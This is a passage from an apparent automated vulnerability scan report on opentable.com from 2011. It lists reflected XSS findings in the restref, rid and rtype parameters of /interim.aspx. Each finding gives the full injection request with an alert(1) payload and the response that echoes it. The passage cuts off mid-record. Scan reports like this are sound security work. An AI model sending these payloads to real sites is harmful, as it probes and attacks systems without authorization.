Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=2&vbefreg=2&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61d59b16cfdda46b784&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=o47%2fll%2bXzyhrFxOPTCorbQ%3d%3d&ts=27&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61d59b16cfdda46b784&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=o47%2fll%2bXzyhrFxOPTCorbQ%3d%3d&ts=27&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:52 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
perties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=254687';alert(1)//b64a7ba4ada&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
Resul
...[SNIP]...
4.59. http://www.opentable.com/interim.aspx [restref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the restref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dcd9'%3balert(1)//489de1fe41b was submitted in the restref parameter. This input was echoed as 8dcd9';alert(1)//489de1fe41b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=908dcd9'%3balert(1)//489de1fe41b&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=px=1&p1=153&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&c=1&x=10%2f03%2f2011+15%3a54%3a48; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=23&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=23&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=23&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:48 GMT; path=/
Vary: Accept-Encoding
Content-Length: 44265


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=908dcd9';alert(1)//489de1fe41b&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2]
...[SNIP]...
4.60. http://www.opentable.com/interim.aspx [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the rid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51fe9'%3balert(1)//74d3d82061 was submitted in the rid parameter. This input was echoed as 51fe9';alert(1)//74d3d82061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=9051fe9'%3balert(1)//74d3d82061&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:47 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=px=1&p1=153&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153&c=1&x=10%2f03%2f2011+15%3a54%3a47; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff310a61db9a82a92b72a5a71&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=eCzj5YUpAfxcH5cXHseujw%3d%3d&ts=19&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=12111003055335014615&vbefres=5&vbefreg=5&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Set-Cookie: pgseq=f310a61dca77848c5d0f3749; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:47 GMT; path=/
Vary: Accept-Encoding
Content-Length: 38314


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
, 'mapimage':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=9051fe9';alert(1)//74d3d82061&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.P
...[SNIP]...
4.61. http://www.opentable.com/interim.aspx [rtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the rtype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25d31'%3balert(1)//e91e394761e was submitted in the rtype parameter. This input was echoed as 25d31';alert(1)//e91e394761e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod25d31'%3balert(1)//e91e394761e HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:55 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a55&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod%2500b8f28%2522%2ba%253db%2b16be442379f&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=153&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=15&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:55 GMT; path=/
